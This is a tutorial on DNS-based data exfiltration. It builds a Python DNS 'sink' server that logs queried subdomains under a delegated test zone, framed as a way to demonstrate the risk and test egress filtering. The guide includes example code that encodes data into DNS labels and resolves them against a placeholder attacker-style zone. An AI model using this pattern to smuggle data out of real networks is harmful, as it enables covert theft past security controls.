Introduction

DNS leaks are usually discussed as a privacy concern for users of VPNs and similar tools. The more serious risk is data exfiltration from protected environments, including those where inbound and outbound access is otherwise locked down.

The underlying weakness is this: even when your DNS query goes to a private resolver first, that resolver has to forward lookups for names it cannot answer to the public internet, where they end up at the authoritative name server for the domain. An attacker who controls a domain and runs its authoritative name server can log every query and recover whatever sensitive data was embedded in the subdomain.

This technique bypasses traditional network security controls because DNS traffic is typically allowed outbound, making it an ideal covert channel for data exfiltration.
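
To make "data embedded in the subdomain" concrete, here is a minimal sketch of how a short test payload can be packed into a single DNS label and recovered from a logged query. The function names and the choice of Base32 are assumptions for illustration, not something this guide's script uses; Base32 is picked here only because its lowercase form stays within the characters DNS labels normally carry.

```python
import base64

MAX_LABEL = 63  # RFC 1035 limit for a single DNS label


def encode_label(payload: bytes) -> str:
    """Base32-encode a payload into a lowercase, padding-free DNS label."""
    label = base64.b32encode(payload).decode("ascii").rstrip("=").lower()
    if len(label) > MAX_LABEL:
        raise ValueError("payload too large for one DNS label")
    return label


def decode_label(label: str) -> bytes:
    """Reverse encode_label: restore the stripped padding, then decode."""
    padded = label.upper() + "=" * (-len(label) % 8)
    return base64.b32decode(padded)


def leak_hostname(payload: bytes, zone: str) -> str:
    """Build the hostname whose lookup would carry the payload."""
    return f"{encode_label(payload)}.{zone}"


if __name__ == "__main__":
    # Hypothetical zone name; substitute a test domain you are authorized to use
    name = leak_hostname(b"test-marker", "dnsleaktest.yourdomain.com")
    print(name)
    print(decode_label(name.split(".")[0]))
```

Whoever reads the query log on the authoritative server only needs the first label to reconstruct the payload, which is why blocking direct outbound traffic alone does not close this channel.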

Live Demonstration

You can see this technique in action right now. Try this test:

# This will fail to resolve - you'll get "Host not found"
ping leak-test.dnsleak.lorimar.net

Or try opening one of these in your browser (it will fail to load): http://another-leak-test.dnsleak.lorimar.net/ or http://your-secret-data.dnsleak.lorimar.net/, or any other subdomain of “dnsleak.lorimar.net”.

Now check the results: visit http://ns.dnsleak.lorimar.net:8291/ and you’ll see leak-test logged there, or whatever test string you used as the hostname, even though that DNS name doesn’t actually exist.
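
The same effect can be triggered from any program that resolves a hostname, not only from ping or a browser. The sketch below is an illustration under stated assumptions: the helper names are hypothetical, and the default zone is a placeholder for a test domain you control.

```python
import socket
import uuid


def make_marker_hostname(zone: str = "dnsleaktest.yourdomain.com") -> str:
    """Return a unique, easy-to-spot hostname under the (placeholder) test zone."""
    marker = uuid.uuid4().hex[:12]
    return f"leak-{marker}.{zone}"


def lookup_fails(hostname: str) -> bool:
    """Resolve hostname with the system resolver; True means resolution failed.

    A failed lookup is the expected outcome here: the query still travels to
    the authoritative server, which is all the monitor needs.
    """
    try:
        socket.gethostbyname(hostname)
    except OSError:  # socket.gaierror is a subclass of OSError
        return True
    return False
```

Calling `lookup_fails(make_marker_hostname())` from inside the network under test and then checking the monitor page for the `leak-...` label shows whether the query left the environment.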

Why This Matters

This demonstrates how DNS queries reach someone’s monitoring server, allowing them to capture the subdomain portion - which could contain exfiltrated data.

This guide shows you how to build your own DNS leak detection and monitoring server to:

  • Demonstrate the vulnerability to security teams and stakeholders
  • Test network security controls and DNS filtering effectiveness

The server captures DNS queries for specific test domains and provides a simple HTTP interface to view the results in real time.

Test Prerequisites

Before starting, ensure you have:

  • Ubuntu 20.04+ server with root access
  • Python 3.10 or higher
  • Public network interface that can receive DNS traffic (UDP port 53)
  • A domain you control, so that you can delegate a subdomain to this server

How It Works

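Create a subdomain of a domain you control, e.g. dnsleaktest.yourdomain.com, and delegate it with an NS record pointing at the server where you are installing the script. Resolvers anywhere on the internet will then send queries for any name under that subdomain to your server. Install the script below and set target_suffix in it to your own subdomain. Then use iptables or other traffic-manipulation software of your choice to redirect UDP packets arriving on port 53 to the sink daemon's port 5353 (the script's docstring suggests PREROUTING REDIRECT rules). The daemon never replies, so lookups fail on the client while the queried name is still recorded.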
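
The core of the capture logic is a suffix match on the queried name. The standalone sketch below mirrors what the script's _extract_target_subdomain method does, generalized to a zone of any depth; the function name and signature are hypothetical and exist only for this illustration.

```python
from typing import Optional


def extract_subdomain(qname: str, zone: str) -> Optional[str]:
    """Return the label immediately left of zone in qname, or None if no match."""
    labels = qname.rstrip(".").lower().split(".")
    suffix = zone.rstrip(".").lower().split(".")
    # The name must contain at least one label in front of the zone itself
    if len(labels) <= len(suffix):
        return None
    if labels[-len(suffix):] != suffix:
        return None
    return labels[-len(suffix) - 1]


if __name__ == "__main__":
    zone = "dnsleaktest.yourdomain.com"  # placeholder zone from this guide
    print(extract_subdomain("secret.dnsleaktest.yourdomain.com", zone))
    print(extract_subdomain("www.example.org", zone))
```

Only the label directly in front of the zone is kept, so deeper names such as a.b.dnsleaktest.yourdomain.com are recorded as b.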

Installation and Setup

Step 1: Create the Python Script

Create the directory structure and install the script:

# Create application directory
sudo mkdir -p /opt/dns-monitor

# Create the Python script
sudo nano /opt/dns-monitor/dns_monitor.py

Copy the complete Python script into this file, then set proper permissions:

#!/usr/bin/env python3
"""
DNS Subdomain Monitor — UDP proxy **sink** (no upstream, no replies, no root)
- Binds a UDP socket on a high port (default 5353)
- Parses incoming DNS queries, extracts subdomain before `dnsleaktest.yourdomain.com`
- Records uniques **in memory** and serves them via an HTTP UI (default port 8291, all interfaces)
- **Does not forward or reply** → external queries are silently dropped

Use with PREROUTING REDIRECT rules.
"""

import gc
import logging
import os
import re
import signal
import socket
import sys
import threading
import time
from datetime import datetime, timedelta
from http.server import BaseHTTPRequestHandler, ThreadingHTTPServer
from socketserver import ThreadingMixIn
from typing import Optional, Tuple

# ----------------------------- DNS helpers ----------------------------- #

def _read_labels(data: bytes, offset: int):
    """Parse DNS labels (RFC1035) with compression pointers. Returns (labels, next_offset) or (None, offset)."""
    labels = []
    jumped = False
    orig_offset = offset
    visited = 0
    while True:
        if offset >= len(data):
            return None, offset
        length = data[offset]
        if length == 0:
            offset += 1
            break
        if (length & 0xC0) == 0xC0:
            if offset + 1 >= len(data):
                return None, offset + 1
            ptr = ((length & 0x3F) << 8) | data[offset + 1]
            if visited > 8:
                return None, offset + 2
            visited += 1
            if not jumped:
                orig_offset = offset + 2
                jumped = True
            offset = ptr
            continue
        start = offset + 1
        end = start + length
        if end > len(data):
            return None, end
        labels.append(data[start:end].decode('ascii', errors='ignore'))
        offset = end
    return labels, (orig_offset if jumped else offset)


def parse_qname_from_query(pkt: bytes) -> Optional[str]:
    if len(pkt) < 12:
        return None
    qdcount = int.from_bytes(pkt[4:6], 'big')
    if qdcount < 1:
        return None
    labels, _ = _read_labels(pkt, 12)
    if not labels:
        return None
    return '.'.join(labels).lower()

# -------------------------- Custom HTTP Server ------------------------ #

class RobustHTTPServer(ThreadingHTTPServer):
    """HTTPServer with better resource management"""

    # These must be class attributes: the base class binds the socket inside
    # __init__, so setting allow_reuse_address afterwards has no effect.
    allow_reuse_address = True
    # Daemon threads don't prevent shutdown
    daemon_threads = True

    def __init__(self, *args, **kwargs):
        super().__init__(*args, **kwargs)
        # Used by handle_request() only; serve_forever() ignores this value.
        # Per-connection timeouts are set in the request handler instead.
        self.timeout = 30

class DNSMonitorHTTPHandler(BaseHTTPRequestHandler):
    """HTTP handler with better resource management"""
    
    def __init__(self, dns_monitor, *args, **kwargs):
        self.dns_monitor = dns_monitor
        # Set timeouts to prevent hanging connections
        self.timeout = 30
        super().__init__(*args, **kwargs)
    
    def do_GET(self):
        try:
            with self.dns_monitor.stats_lock:
                self.dns_monitor.stats['http_requests'] += 1
                
            self.send_response(200)
            self.send_header('Content-Type', 'text/html; charset=utf-8')
            self.send_header('Connection', 'close')  # Force connection close
            self.send_header('Cache-Control', 'no-cache, no-store, must-revalidate')
            self.end_headers()
            
            content = self.dns_monitor._page_content()
            html = self._generate_html(content)
            self.wfile.write(html.encode('utf-8'))
            
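        except Exception as e:
            self.dns_monitor.logger.error(f"HTTP handler error: {e}")
        finally:
            # Ask the base class to close the connection after this response.
            # Closing wfile here would make the flush() that runs after
            # do_GET raise on every request.
            self.close_connection = True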
   
    def _generate_html(self, content: str) -> str:
        return f"""<!DOCTYPE html><html lang='en'><head>
<meta charset='UTF-8'><meta name='viewport' content='width=device-width, initial-scale=1.0'>
<title>DNS Leak Monitor</title>
<style>body{{font-family:'Courier New',monospace;background:#1a1a1a;color:#00ff00;margin:0;padding:20px}}.container{{max-width:1200px;margin:0 auto}}.header{{background:#2d2d2d;padding:20px;border-radius:8px;margin-bottom:20px;border-left:4px solid #ff6b6b}}.disclaimer{{background:#ff6b6b;color:#fff;padding:15px;border-radius:8px;margin-bottom:20px;font-weight:bold}}.content{{background:#2d2d2d;padding:20px;border-radius:8px;white-space:pre-wrap}}h1{{color:#00ff00;margin:0 0 10px 0}}.subtitle{{color:#888;font-size:14px}}.refresh-info{{color:#ffd700;font-size:12px;text-align:right;margin-top:10px}}</style>
</head><body><div class='container'>
        <div class="disclaimer">
            ⚠️ EDUCATIONAL PURPOSE ONLY: This tool is designed for educational and authorized security testing purposes only. 
            Users must ensure they have proper authorization before monitoring any network traffic. 
            Unauthorized use may violate local laws and regulations. Use at your own risk. 
            <div class="content-section">
                    <h4>Permitted Usage</h4>
                    <ul>
                        <li>Educational research and training</li>
                        <li>Authorized security assessments</li>
                    </ul>
                </div>
                <div class="content-section">
                    <h4>Legal Requirements</h4>
                    <ul>
                        <li>Written authorization from network owners</li>
                        <li>Compliance with local privacy laws</li>
                        <li>Adherence to computer crime statutes</li>
                    </ul>
                </div>
                <div class="content-section">
                    <h4>Prohibited Activities</h4>
                    <ul>
                        <li>Unauthorized network reconnaissance</li>
                        <li>Malicious DNS traffic injection</li>
                        <li>Privacy violations or data theft</li>
                    </ul>
                </div>
            <div class="section">
                <strong>Liability Disclaimer:</strong>
                The developers, contributors, and distributors of this software disclaim all liability for damages resulting from unauthorized or improper use. Users assume full legal and financial responsibility for their actions.
            </div>
</div>
<div class='header'><h1>🔍 DNS Leak Monitor</h1>
<div class='subtitle'>Try to lookup, browse or ping any test-hostname.dnsleaktest.yourdomain.com</div>
<div class='refresh-info'>Current time: {datetime.now().strftime('%Y-%m-%d %H:%M:%S')}</div></div>
<div class='content'>{content.replace('<','&lt;').replace('>','&gt;')}</div>
</div></body></html>"""
    
    def log_message(self, format, *args):
        # Suppress default HTTP logging to reduce log spam
        pass
    
    def handle_one_request(self):
        """Override to add better error handling"""
        try:
            super().handle_one_request()
        except Exception as e:
            self.dns_monitor.logger.error(f"HTTP request handling error: {e}")
        finally:
            # Force cleanup
            try:
                self.close_connection = True
            except:
                pass

# ------------------------------ Main class ----------------------------- #

class DNSMonitor:
    MAX_ENTRIES = 10  # cap in-memory growth

    def __init__(self,
                 port: int = 8291,
                 clean_interval: int = 300,
                 listen: str = "0.0.0.0:5353",
                 debug: bool = False):
        self.port = port
        self.clean_interval = clean_interval
        self.http_server = None
        self.running = False
        self.last_cleanup = datetime.now()
        self.http_restart_count = 0
        self.debug = debug

        # In-memory store: subdomain -> first_seen timestamp
        self.captured: dict[str, datetime] = {}
        self.captured_lock = threading.RLock()  # Thread-safe access
        
        # Statistics
        self.stats = {
            'dns_queries_received': 0,
            'dns_queries_parsed': 0,
            'subdomains_captured': 0,
            'http_requests': 0
        }
        self.stats_lock = threading.RLock()

        # DNS sink settings
        self.listen_host, self.listen_port = self._parse_hostport(listen, 5353)
        self.dns_sock: Optional[socket.socket] = None

        # Suffix to match and extract subdomain from
        self.target_suffix = ["dnsleaktest", "yourdomain", "com"]

        log_level = logging.DEBUG if debug else logging.INFO
        logging.basicConfig(level=log_level, format='%(asctime)s - %(levelname)s - %(message)s')
        self.logger = logging.getLogger(__name__)

    # ---------------------------- Lifecycle ---------------------------- #

    def setup_signal_handlers(self):
        def handler(signum, frame):
            self.logger.info(f"Received signal {signum}, shutting down...")
            self.cleanup(); sys.exit(0)
        signal.signal(signal.SIGINT, handler)
        signal.signal(signal.SIGTERM, handler)

    def cleanup(self):
        self.logger.info("Cleaning up...")
        self.running = False
        if self.http_server:
            try: 
                self.http_server.shutdown()
                self.http_server.server_close()
            except Exception as e: 
                self.logger.error(f"HTTP shutdown: {e}")
        if self.dns_sock:
            try: 
                self.dns_sock.close()
            except Exception: 
                pass

    # ---------------------------- In-memory store ----------------------- #

    def clear_store(self):
        with self.captured_lock:
            self.captured.clear()
            self.last_cleanup = datetime.now()
        self.logger.info("Cleared in-memory store")
        # Force garbage collection after cleanup
        gc.collect()

    def start_cleanup_timer(self):
        def worker():
            while self.running:
                try:
                    time.sleep(self.clean_interval)
                    if self.running:
                        self.clear_store()
                except Exception as e:
                    self.logger.error(f"Cleanup worker error: {e}")
        threading.Thread(target=worker, daemon=True).start()
        self.logger.info(f"Started cleanup timer (interval: {self.clean_interval} seconds)")

    def record_subdomain(self, sub: Optional[str]):
        if not sub: 
            return
        if not re.fullmatch(r"[a-z0-9_-]+", sub):
            self.logger.debug(f"Rejected invalid subdomain format: {sub}")
            return
        
        with self.captured_lock:
            if sub in self.captured:
                return
            # cap growth
            if len(self.captured) >= self.MAX_ENTRIES:
                # drop oldest
                oldest_key = next(iter(self.captured))
                self.captured.pop(oldest_key)
                self.logger.debug(f"Dropped oldest subdomain: {oldest_key}")
            self.captured[sub] = datetime.now()
        
        with self.stats_lock:
            self.stats['subdomains_captured'] += 1
        
        self.logger.info(f"Captured subdomain: {sub}")

    # ---------------------------- DNS sink ----------------------------- #

    def _parse_hostport(self, s: str, default_port: int) -> Tuple[str, int]:
        if s.startswith("[") and "]" in s:
            host, _, rest = s[1:].partition("]")
            port = int(rest[1:]) if rest.startswith(":") and rest[1:].isdigit() else default_port
            return host, port
        if ':' in s and s.count(':') == 1:
            h, p = s.split(':', 1)
            try: return h, int(p)
            except ValueError: return h or '0.0.0.0', default_port
        return (s or '0.0.0.0'), default_port

    def _extract_target_subdomain(self, qname: str) -> Optional[str]:
        labels = qname.split('.')
        if len(labels) < 4: return None
        if labels[-3:] == self.target_suffix:
            return labels[-4].lower()
        return None

    def start_dns_sink(self):
        try:
            self.dns_sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
            # Increase socket buffer modestly for burst tolerance
            self.dns_sock.setsockopt(socket.SOL_SOCKET, socket.SO_RCVBUF, 512 * 1024)
            # Set socket timeout to prevent hanging - but longer to avoid too many timeouts
            self.dns_sock.settimeout(5.0)
            self.dns_sock.bind((self.listen_host, self.listen_port))
            self.logger.info(f"DNS sink listening on {self.listen_host}:{self.listen_port}")
        except Exception as e:
            self.logger.error(f"DNS sink startup failed: {e}")
            sys.exit(1)

        def serve():
            consecutive_errors = 0
            max_consecutive_errors = 10
            
            while self.running:
                try:
                    data, addr = self.dns_sock.recvfrom(4096)
                    consecutive_errors = 0  # Reset error counter on successful receive
                    
                    with self.stats_lock:
                        self.stats['dns_queries_received'] += 1
                    
                    # Parse & record; **do not** reply
                    try:
                        qname = parse_qname_from_query(data)
                        if qname:
                            with self.stats_lock:
                                self.stats['dns_queries_parsed'] += 1
                            
                            sub = self._extract_target_subdomain(qname)
                            if sub:
                                self.record_subdomain(sub)
                            
                            # Log all DNS queries in debug mode
                            if self.debug:
                                self.logger.debug(f"DNS query: {qname} from {addr[0]} -> subdomain: {sub}")
                        else:
                            if self.debug:
                                self.logger.debug(f"Failed to parse DNS query from {addr[0]}")
                    except Exception as e:
                        self.logger.debug(f"QNAME parse error: {e}")
                        
                except socket.timeout:
                    continue  # Normal timeout, continue loop
                except OSError as e:
                    consecutive_errors += 1
                    if self.running:
                        self.logger.error(f"DNS socket error #{consecutive_errors}: {e}")
                        if consecutive_errors >= max_consecutive_errors:
                            self.logger.error("Too many consecutive DNS errors, stopping DNS sink")
                            break
                    time.sleep(0.1)  # Brief pause before retry
                except Exception as e:
                    consecutive_errors += 1
                    self.logger.error(f"DNS receive error #{consecutive_errors}: {e}")
                    if consecutive_errors >= max_consecutive_errors:
                        self.logger.error("Too many consecutive DNS errors, stopping DNS sink")
                        break
                    time.sleep(0.1)  # Brief pause before retry
                    
        threading.Thread(target=serve, daemon=True).start()

    # --------------------------- HTTP UI with Monitoring --------------- #

    def _page_content(self) -> str:
        with self.captured_lock:
            with self.stats_lock:
                if not self.captured:
                    stats_info = (
                        f"# DNS Leak Monitor - Active since {self.last_cleanup.strftime('%Y-%m-%d %H:%M:%S')}\n"
                        f"# Statistics:\n"
                        f"#   DNS queries received: {self.stats['dns_queries_received']}\n"
                        f"#   DNS queries parsed: {self.stats['dns_queries_parsed']}\n"
                        f"#   Subdomains captured: {self.stats['subdomains_captured']}\n"
                        f"#   HTTP requests served: {self.stats['http_requests']}\n"
                        f"#   HTTP server restarts: {self.http_restart_count}\n\n"
                        "No DNS leak records captured yet.\n\n"
                        "Debug info:\n"
                        f"- Listening on {self.listen_host}:{self.listen_port}\n"
                        f"- Target suffix: {'.'.join(self.target_suffix)}\n"
                        f"- Debug mode: {'ON' if self.debug else 'OFF'}\n"
                    )
                    return stats_info
                
                next_cleanup = self.last_cleanup + timedelta(seconds=self.clean_interval)
                header = (
                    f"# DNS Leak Monitor - Active since {self.last_cleanup.strftime('%Y-%m-%d %H:%M:%S')}\n"
                    f"# Next cleanup: {next_cleanup.strftime('%Y-%m-%d %H:%M:%S')}\n"
                    f"# Statistics:\n"
                    f"#   DNS queries received: {self.stats['dns_queries_received']}\n"
                    f"#   DNS queries parsed: {self.stats['dns_queries_parsed']}\n"
                    f"#   Subdomains captured: {self.stats['subdomains_captured']}\n"
                    f"#   HTTP requests served: {self.stats['http_requests']}\n"
                    f"#   HTTP server restarts: {self.http_restart_count}\n"
                    f"# Unique domains captured: {len(self.captured)}\n"
                    f"# Captured subdomains (first-seen order):\n\n"
                )
                body = "\n".join(self.captured.keys())
                return header + body

    def start_http_server(self):
        try:
            # Create handler factory that properly binds the dns_monitor instance
            def handler_factory(*args, **kwargs):
                return DNSMonitorHTTPHandler(self, *args, **kwargs)
            
            self.http_server = RobustHTTPServer(('0.0.0.0', self.port), handler_factory)
            self.logger.info(f"HTTP UI: http://0.0.0.0:{self.port}")
            
            # Start server in a separate thread
            server_thread = threading.Thread(target=self.http_server.serve_forever, daemon=True)
            server_thread.start()
            
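            # Start the HTTP monitoring thread only once; a restart re-enters
            # this method and must not spawn a duplicate monitor
            if not getattr(self, '_http_monitor_started', False):
                self._http_monitor_started = True
                self.start_http_monitor()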
            
        except Exception as e:
            self.logger.error(f"HTTP server failed: {e}")
            sys.exit(1)

    def start_http_monitor(self):
        """Monitor HTTP server health and restart if needed"""
        def monitor():
            last_check = time.time()
            while self.running:
                try:
                    time.sleep(60)  # Check every minute
                    current_time = time.time()
                    
                    # Check if server is still responding
                    if self.http_server and not self._is_http_healthy():
                        self.logger.warning("HTTP server appears unhealthy, restarting...")
                        self._restart_http_server()
                    
                    # Force garbage collection every 10 minutes
                    if current_time - last_check > 600:
                        gc.collect()
                        last_check = current_time
                        
                except Exception as e:
                    self.logger.error(f"HTTP monitor error: {e}")
        
        threading.Thread(target=monitor, daemon=True).start()
        self.logger.info("Started HTTP server monitor")

    def _is_http_healthy(self) -> bool:
        """Simple health check for HTTP server"""
        try:
            # Try to create a test socket connection
            test_sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
            test_sock.settimeout(5)
            result = test_sock.connect_ex(('127.0.0.1', self.port))
            test_sock.close()
            return result == 0
        except Exception:
            return False

    def _restart_http_server(self):
        """Restart the HTTP server"""
        try:
            if self.http_server:
                self.http_server.shutdown()
                self.http_server.server_close()
            
            # Wait a moment for cleanup
            time.sleep(2)
            
            # Force garbage collection
            gc.collect()
            
            # Restart server
            self.start_http_server()
            self.http_restart_count += 1
            self.logger.info(f"HTTP server restarted (restart #{self.http_restart_count})")
            
        except Exception as e:
            self.logger.error(f"HTTP server restart failed: {e}")

    # ------------------------------ Run -------------------------------- #

    def run(self):
        self.setup_signal_handlers()
        self.running = True
        self.clear_store()
        self.start_cleanup_timer()
        self.start_dns_sink()
        self.start_http_server()
        self.logger.info("DNS Monitor started (sink mode)")
        try:
            while self.running:
                time.sleep(1)
        except KeyboardInterrupt:
            pass
        finally:
            self.cleanup()

# ------------------------------ CLI entry ------------------------------ #

def main():
    import argparse
    p = argparse.ArgumentParser(description='DNS Subdomain Monitor (UDP sink, in-memory)')
    p.add_argument('--port', '-p', type=int, default=8291, help='HTTP server port (default: 8291)')
    p.add_argument('--clean-interval', '-i', type=int, default=300, help='In-memory cleanup interval in seconds (default: 300 = 5 minutes)')
    p.add_argument('--listen', default='0.0.0.0:5353', help='DNS sink listen address:port (default: 0.0.0.0:5353)')
    p.add_argument('--daemon', '-d', action='store_true', help='Run as daemon (fork to background)')
    p.add_argument('--debug', action='store_true', help='Enable debug logging')
    args = p.parse_args()

    if args.daemon:
        try:
            pid = os.fork()
            if pid > 0:
                print(f"DNS Monitor sink started with PID: {pid}"); sys.exit(0)
        except OSError as e:
            print(f"Fork failed: {e}"); sys.exit(1)
        os.setsid(); os.chdir('/')
        with open('/dev/null', 'r') as f: os.dup2(f.fileno(), sys.stdin.fileno())
        with open('/dev/null', 'a') as f: os.dup2(f.fileno(), sys.stdout.fileno()); os.dup2(f.fileno(), sys.stderr.fileno())

    DNSMonitor(port=args.port, clean_interval=args.clean_interval, listen=args.listen, debug=args.debug).run()

if __name__ == '__main__':
    main()

Set executable permissions

sudo chmod +x /opt/dns-monitor/dns_monitor.py

Step 2: Test the Script

Before creating the service, test the script manually:

# Test basic functionality
sudo python3 /opt/dns-monitor/dns_monitor.py --help

# Run a quick test (Ctrl+C to stop)
sudo python3 /opt/dns-monitor/dns_monitor.py

In another terminal, you can test the HTTP interface:

# Check if the service is responding
curl http://localhost:8291
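
Before DNS delegation and the port 53 redirect are in place, the sink can be exercised directly by sending it a hand-built query on its high port. This is a minimal sketch: build_query and send_query are hypothetical helper names, and the packet contains only what the script's parser reads (a 12-byte header and one question).

```python
import socket
import struct


def build_query(qname: str, query_id: int = 0x1234) -> bytes:
    """Build a minimal DNS query: one question, type A, class IN."""
    # Header: ID, flags (recursion desired), QDCOUNT=1, other counts zero
    header = struct.pack("!HHHHHH", query_id, 0x0100, 1, 0, 0, 0)
    question = b""
    for label in qname.rstrip(".").split("."):
        raw = label.encode("ascii")
        if not 0 < len(raw) <= 63:
            raise ValueError(f"invalid label length: {label!r}")
        question += bytes([len(raw)]) + raw
    # Root label terminator, then QTYPE=A (1) and QCLASS=IN (1)
    question += b"\x00" + struct.pack("!HH", 1, 1)
    return header + question


def send_query(qname: str, host: str = "127.0.0.1", port: int = 5353) -> None:
    """Fire one query at the sink; no reply is expected, so none is awaited."""
    with socket.socket(socket.AF_INET, socket.SOCK_DGRAM) as sock:
        sock.sendto(build_query(qname), (host, port))
```

With the script running, `send_query("probe1.dnsleaktest.yourdomain.com")` followed by another `curl http://localhost:8291` should list probe1, assuming target_suffix still has its default value.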

Creating the Systemd Service

Step 3: Service Configuration

Create user and group

if ! id dnsmon >/dev/null 2>&1; then
    sudo groupadd --system dnsmon
    sudo useradd --system --no-create-home --shell /usr/sbin/nologin --gid dnsmon dnsmon
fi

Fix ownership of your script directory

sudo chown -R dnsmon:dnsmon /opt/dns-monitor/
sudo chmod 755 /opt/dns-monitor/dns_monitor.py

Create a systemd service file:

sudo nano /etc/systemd/system/dns-monitor.service

The service configuration includes important security and reliability features:

[Unit]
Description=DNS Subdomain Monitor Daemon
After=network-online.target
Wants=network-online.target

[Service]
Type=simple
User=dnsmon
Group=dnsmon
ExecStart=/usr/bin/python3 /opt/dns-monitor/dns_monitor.py
Restart=always
RestartSec=5
StandardOutput=journal
StandardError=journal
SyslogIdentifier=dns-monitor

# Working directory
WorkingDirectory=/opt/dns-monitor

# Environment
Environment=PYTHONUNBUFFERED=1

# Security settings
NoNewPrivileges=true
PrivateTmp=true
ProtectSystem=strict
ProtectHome=true
ProtectKernelTunables=true
ProtectKernelModules=true
ProtectControlGroups=true
RestrictRealtime=true
RestrictSUIDSGID=true
RemoveIPC=true
PrivateDevices=true

[Install]
WantedBy=multi-user.target

Step 4: Enable and Start the Service

# Reload systemd configuration
sudo systemctl daemon-reload

# Enable the service to start on boot
sudo systemctl enable dns-monitor.service

# Start the service
sudo systemctl start dns-monitor.service

# Check service status
sudo systemctl status dns-monitor.service

Monitoring the Service

Use these commands to monitor your DNS monitor service:

# View real-time logs
sudo journalctl -u dns-monitor -f

# Check recent logs
sudo journalctl -u dns-monitor --since "10 minutes ago"

# View service resource usage
sudo systemctl show dns-monitor --property=MemoryCurrent,CPUUsageNSec

# Restart if needed
sudo systemctl restart dns-monitor

Testing and Validation

Step 5: Local Testing

Test your DNS leak detection server:

# 1. Verify the service is running
sudo systemctl is-active dns-monitor

# 2. Check that the HTTP (8291) and DNS sink (5353) ports are listening
sudo ss -tulnp | grep -E '8291|5353'

# 3. Test HTTP interface locally
curl http://localhost:8291

# 4. Generate test DNS queries (each lookup is expected to time out,
#    because the sink records the name but never replies)
for i in {1..5}; do
    nslookup "test${i}.dnsleaktest.yourdomain.com" 8.8.8.8
    sleep 1
done

# 5. Check if queries were captured
curl http://localhost:8291
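
Step 5 can also be checked programmatically rather than by eye. The sketch below pulls the captured labels out of the monitor's HTML page; it assumes the page layout produced by the script above (a div with class='content' holding '#' comment lines followed by one label per line), and the function names are hypothetical.

```python
import re
import urllib.request

# The script wraps its plain-text report in this div (single-quoted attribute)
CONTENT_RE = re.compile(r"<div class='content'>(.*?)</div>", re.DOTALL)
# Same character set that record_subdomain accepts
LABEL_RE = re.compile(r"[a-z0-9_-]+")


def captured_labels(html: str) -> list[str]:
    """Return the captured subdomain labels listed in the monitor page."""
    match = CONTENT_RE.search(html)
    if not match:
        return []
    lines = (line.strip() for line in match.group(1).splitlines())
    # Header lines start with '#', status lines contain spaces; neither matches
    return [line for line in lines if LABEL_RE.fullmatch(line)]


def fetch_captured(url: str = "http://localhost:8291/") -> list[str]:
    """Download the monitor page and extract the captured labels."""
    with urllib.request.urlopen(url, timeout=5) as resp:
        return captured_labels(resp.read().decode("utf-8"))
```

After running the nslookup loop, `fetch_captured()` should include test1 through test5 if the queries reached the sink.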

Remote Testing

From another machine on your network:

# Replace YOUR_SERVER_IP with the server's actual IP address. The test
# subdomain itself never resolves, because the sink does not answer queries.
curl http://YOUR_SERVER_IP:8291

# Test with telnet
telnet YOUR_SERVER_IP 8291
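
Where telnet is not installed, a few lines of Python perform the same TCP reachability check. This is a small sketch with a hypothetical function name; it only tests that the port accepts connections, not that the page content is correct.

```python
import socket


def port_open(host: str, port: int, timeout: float = 3.0) -> bool:
    """Return True if a TCP connection to host:port succeeds within timeout."""
    try:
        with socket.create_connection((host, port), timeout=timeout):
            return True
    except OSError:  # refused, unreachable, timed out, or name not resolved
        return False
```

For example, `port_open("YOUR_SERVER_IP", 8291)` with the placeholder replaced by the server's address returns False when a firewall blocks the HTTP port.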

Conclusion

This setup lets you demonstrate DNS-based data exfiltration to security teams and stakeholders, and test whether your network's DNS filtering and egress controls actually stop it.